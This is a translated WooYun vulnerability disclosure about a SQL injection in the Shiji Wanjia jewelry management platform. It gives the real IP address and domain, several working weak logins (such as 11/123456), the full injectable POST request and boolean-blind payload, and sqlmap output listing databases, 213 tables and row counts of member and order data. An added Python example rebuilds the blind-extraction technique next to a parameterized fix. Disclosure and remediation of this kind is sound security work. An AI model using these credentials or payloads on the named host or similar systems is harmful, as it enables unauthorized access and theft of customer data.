
Vulnerability Summary

Defect ID: wooyun-2016-0190327

Title: Shiji Wanjia (世纪万佳) jewelry platform vulnerability leaks over a million orders and tens of thousands of user account records, and allows viewing reports, managing gold prices, etc.

Vendor: 深圳市世纪万佳科技有限公司 (Shenzhen Shiji Wanjia Technology Co., Ltd.)

Author: 保护伞

Submitted: 2016-03-29 16:49

Fix deadline: 2016-05-13 16:50

Published: 2016-05-13 16:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2016-03-29: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-13: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As in the title.

Detailed description:

Main site: http://www.gold-shop.cn/
Management platform: http://202.104.113.190/
Some of the accounts on the management platform (username password):
11 123456
12 123456
99 99
111 111


(Screenshots 1.jpg, 2.jpg, 3.jpg, 4.jpg, 5.jpg and 7.jpg were attached to the original report and are not reproduced here.)


Injection: the retailOrderNo parameter of the following POST request to the management platform (the captured request is followed by the sqlmap findings):

POST http://202.104.113.190/distribution/ListVRetailDetail.do HTTP/1.1
Host: 202.104.113.190
Connection: keep-alive
Content-Length: 440
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://202.104.113.190
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://202.104.113.190/distribution/ListVRetailDetail.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=7BD224DCACF34ACE97B88510890241F5
opMode=list&navMode=L&pageId=1&orderBy=&order=&isFirst=N&siteId=&retailType=&startDate=2016-03-25&endDate=2016-03-25&retailOrderNo=123&goodsBarcode=&customerName=&goodsCategoryId=&goodsTypeId=&stoneId=&startGoldWeight=&endGoldWeight=&startLabelPrice=&endLabelPrice=&startStonesWeight=&endStonesWeight=&orderStatus=&stonePureId=&stoneToneId=&stoneCircle=&companyNo=&factoryStyle=&supplierId=&staffId=&pageSize=15&pageNumber=0
Parameter: retailOrderNo (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: opMode=list&navMode=L&pageId=1&orderBy=&order=&isFirst=N&siteId=&retailType=&startDate=2016-03-02&endDate=2016-03-03&retailOrderNo=123 AND 7109=7109 AND 'EgRb'='EgRb&goodsBarcode=&customerName=&goodsCategoryId=&goodsTypeId=&stoneId=&startGoldWeight=&endGoldWeight=&startLabelPrice=&endLabelPrice=&startStonesWeight=&endStonesWeight=&orderStatus=&stonePureId=&stoneToneId=&stoneCircle=&companyNo=&factoryStyle=&supplierId=&retailType=4&retailType=1&retailType=1&retailType=1&retailType=4&retailType=1&retailType=1&retailType=1&retailType=1&pageSize=15&pageNumber=1
Vector: AND [INFERENCE]
---
back-end DBMS: MySQL 5
available databases [8]:
[*] information_schema
[*] jpsim
[*] jpsim2
[*] mysql
[*] performance_schema
[*] sakila
[*] test
[*] world
Database: jpsim
[213 tables]
+------------------------------------+
| audit_login_out |
| audit_trail |
| basic_brand |
| basic_gold_stone |
| basic_goods_category |
| basic_goods_diamond_color |
| basic_goods_diamond_element |
| basic_goods_diamond_process |
| basic_goods_diamond_pure |
| basic_goods_diamond_shape |
| basic_goods_diamond_tone |
| basic_goods_type |
| basic_suppliers |
| basic_warehouse |
| basic_weight |
| check_goods_init12 |
| check_goods_init122 |
| check_goods_init159 |
| check_goods_init169 |
| check_goods_init184 |
| check_goods_init190 |
| check_goods_init196 |
| check_goods_init199 |
| check_goods_init2 |
| check_goods_init234 |
| check_goods_init244 |
| check_goods_init261 |
| check_goods_init280 |
| check_goods_init283 |
| check_goods_init288 |
| check_goods_init292 |
| check_goods_init296 |
| check_goods_init30 |
| check_goods_init307 |
| check_goods_init333 |
| check_goods_init356 |
| check_goods_init361 |
| check_goods_init366 |
| check_goods_init368 |
| check_goods_init378 |
| check_goods_init387 |
| check_goods_init39 |
| check_goods_init433 |
| check_goods_init436 |
| check_goods_init440 |
| check_goods_init456 |
| check_goods_init463 |
| check_goods_init466 |
| check_goods_init469 |
| check_goods_init477 |
| check_goods_init483 |
| check_goods_init491 |
| check_goods_init505 |
| check_goods_init508 |
| check_goods_init511 |
| check_goods_init515 |
| check_goods_init519 |
| check_goods_init571 |
| check_goods_init574 |
| check_goods_init586 |
| check_goods_init589 |
| check_goods_init595 |
| check_goods_init609 |
| check_goods_init612 |
| check_goods_init64 |
| check_goods_init94 |
| check_goods_order |
| checkgoods_order_detail |
| checkgoods_order_result |
| coefficient_message |
| coefficient_message_detail |
| com_organization |
| company_goods_seq |
| company_message_history |
| company_message_info |
| company_param |
| consumption_records |
| consumption_score_records |
| cost_change_order |
| cost_change_order_detail |
| current_coefficient |
| decoration_inbound |
| decoration_message |
| decoration_req_order |
| decoration_req_order_detail |
| decoration_warehouse_goods |
| diamond_price |
| dms_document |
| dms_mtm_company_document |
| form_element |
| goods |
| goods_life_cycle |
| inlayin_bound_order |
| inlayin_bound_order_detail |
| inventory_sheet_order |
| inventory_sheet_order_detail |
| label_price_order |
| label_price_order_detail |
| maintain_handle |
| maintain_order |
| maintain_order_detail |
| material_info |
| material_recyling_order |
| material_recyling_order_detail |
| material_req_order |
| material_req_order_detail |
| material_warehouse |
| member_info |
| member_info_adjust |
| member_money_order |
| member_type |
| mtm_company_checkgoods |
| mtm_company_form_element |
| mtm_company_rule |
| mtm_company_sysfunction |
| mtm_staff_site |
| mtm_staff_staff |
| mtm_user_record_user_role |
| mtm_user_role_fun_element |
| mtm_warehouse_site |
| no_for_supervision_rule |
| org_basic_message |
| org_staff |
| out_bound_detail |
| out_ound_order |
| personal_home_preference |
| present_inbound |
| present_message |
| present_req_order |
| present_req_order_detail |
| present_warehouse_goods |
| price_markup |
| price_markup_detail |
| price_markup_now |
| price_weighted_coefficient |
| price_weighted_coefficient_history |
| requisition_order |
| requisition_order_detail |
| retail_amount_set |
| retail_order |
| retail_order_detail |
| retail_order_no_rule |
| return_goods_order |
| return_goods_order_detail |
| return_material_detail |
| score_set |
| shift_order |
| shift_order_detail |
| site_gold_price |
| site_ratio |
| site_ratio_history |
| sms_send |
| sys_delete_reference |
| sys_enums |
| sys_function |
| sys_no_rule |
| sys_no_rule_coeff01 |
| sys_no_rule_db01 |
| sys_no_rule_decoration01 |
| sys_no_rule_diamond01 |
| sys_no_rule_dj01 |
| sys_no_rule_in01 |
| sys_no_rule_jlreq01 |
| sys_no_rule_member01 |
| sys_no_rule_money01 |
| sys_no_rule_mtod01 |
| sys_no_rule_out01 |
| sys_no_rule_pd01 |
| sys_no_rule_present01 |
| sys_no_rule_ro01 |
| sys_no_rule_ro02 |
| sys_no_rule_sftod01 |
| sys_no_rule_sj01 |
| sys_no_rule_supervision01 |
| sys_no_rule_tj01 |
| sys_no_rule_xq01 |
| sys_parameter |
| sys_table_key_generator |
| user_record |
| user_role |
| user_role_permission |
| v_checkgoods_detail |
| v_coeffice_stone |
| v_coefficient |
| v_company_function_element |
| v_costchangeoderdetailquery |
| v_goodcategorybyretail |
| v_goodsbymultiquery |
| v_goodsforlabelprice |
| v_goodsmonthcount |
| v_inlayin_history |
| v_inlayinboundorder_detail |
| v_inventory_quality |
| v_labelprice_goods_print |
| v_labelpricebygoldenin |
| v_material_requsition_history |
| v_material_warehouse |
| v_orgstaffanduser |
| v_orgstaffbysite |
| v_outound_history |
| v_report_dayretailorder |
| v_report_present |
| v_report_profit |
| v_report_totalretailorder |
| v_report_warehouse |
| v_requistion_history |
| v_retail_detail |
| v_retail_detail_count |
| v_role_function_element |
| v_sitesidbystaffid |
| v_warehousegoods |
| v_warehousegoods_road |
| warehouse_goods |
+------------------------------------+
Database: jpsim
+-------------+---------+
| Table | Entries |
+-------------+---------+
| member_info | 36719 |
+-------------+---------+
Database: jpsim
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| inlayin_bound_order_detail | 1053628 |
+----------------------------+---------+
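The boolean-based blind finding above is worth seeing end to end. The following Python is an added example, not code from the report or from the vendor's platform: it reconstructs, as an assumption, a ListVRetailDetail.do-style handler that concatenates retailOrderNo into the WHERE clause, drives it with the same `AND (...) AND 'EgRb'='EgRb` shape sqlmap used in order to infer a value one character at a time, and shows the parameterized version returning nothing to the same probes. It runs against an in-memory SQLite database with constructed rows (table names are borrowed from the listing above, the column names and the phone number are invented); the real query's quoting context is not shown on the page and is assumed here to be a single-quoted string literal, and SQLite's `unicode()`/`substr()` stand in for MySQL's `ORD()`/`SUBSTRING()`.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the jpsim schema: two tiny tables with invented rows.
    The real database (213 tables, 36,719 member_info rows) is not reproduced."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE retail_order (retail_order_no TEXT, customer_name TEXT, start_date TEXT)"
    )
    con.executemany(
        "INSERT INTO retail_order VALUES (?, ?, ?)",
        [("123", "Alice", "2016-03-25"), ("124", "Bob", "2016-03-25")],
    )
    con.execute("CREATE TABLE member_info (member_id INTEGER, phone TEXT)")
    con.execute("INSERT INTO member_info VALUES (1, '13800000000')")  # constructed value
    return con


def list_retail_vulnerable(con, retail_order_no, start_date, end_date):
    """Hypothetical reconstruction of the ListVRetailDetail.do filter: retailOrderNo
    is concatenated into the WHERE clause, which is what the sqlmap finding implies."""
    sql = (
        "SELECT retail_order_no, customer_name FROM retail_order "
        f"WHERE start_date BETWEEN '{start_date}' AND '{end_date}' "
        f"AND retail_order_no = '{retail_order_no}'"
    )
    return con.execute(sql).fetchall()


def list_retail_fixed(con, retail_order_no, start_date, end_date):
    """Same query with bound parameters: the payload becomes a literal order number."""
    sql = (
        "SELECT retail_order_no, customer_name FROM retail_order "
        "WHERE start_date BETWEEN ? AND ? AND retail_order_no = ?"
    )
    return con.execute(sql, (start_date, end_date, retail_order_no)).fetchall()


def oracle(handler, con, condition):
    """Boolean oracle in the shape of sqlmap's payload: order 123 exists on
    2016-03-25, so its row comes back only when the injected condition is true."""
    payload = f"123' AND ({condition}) AND 'EgRb'='EgRb"
    rows = handler(con, payload, "2016-03-25", "2016-03-25")
    return len(rows) == 1


def blind_extract(handler, con, subquery, max_len=32):
    """Recover the scalar result of `subquery` through the oracle: first its length,
    then each character by binary search over printable ASCII (about 7 requests per
    character). length()/substr()/unicode() are the SQLite spellings; on the MySQL 5
    backend identified by sqlmap they would be LENGTH()/SUBSTRING()/ORD()."""
    length = 0
    for n in range(1, max_len + 1):
        if oracle(handler, con, f"length(({subquery})) = {n}"):
            length = n
            break
    result = ""
    for i in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(handler, con, f"unicode(substr(({subquery}), {i}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    con = build_db()
    target = "SELECT phone FROM member_info WHERE member_id = 1"
    print("vulnerable handler leaks:", repr(blind_extract(list_retail_vulnerable, con, target)))
    print("fixed handler leaks:", repr(blind_extract(list_retail_fixed, con, target)))
    print("fixed handler, normal use:", list_retail_fixed(con, "123", "2016-03-25", "2016-03-25"))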

Proof of vulnerability:

(Screenshots 6.jpg and 8.jpg were attached to the original report and are not reproduced here.)


Fix recommendation:

As the title implies: build the retailOrderNo filter in ListVRetailDetail.do, and the other list-filter parameters of the management platform, with prepared statements instead of concatenating user input into the WHERE clause; remove the trivial accounts listed above (11/123456 and the like) and require non-default passwords; and keep the management platform at 202.104.113.190 off the public internet or behind access control.

Copyright notice: when reposting, please credit the source: 保护伞@乌云


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively declined to respond

Vulnerability Rank: 15 (WooYun rating)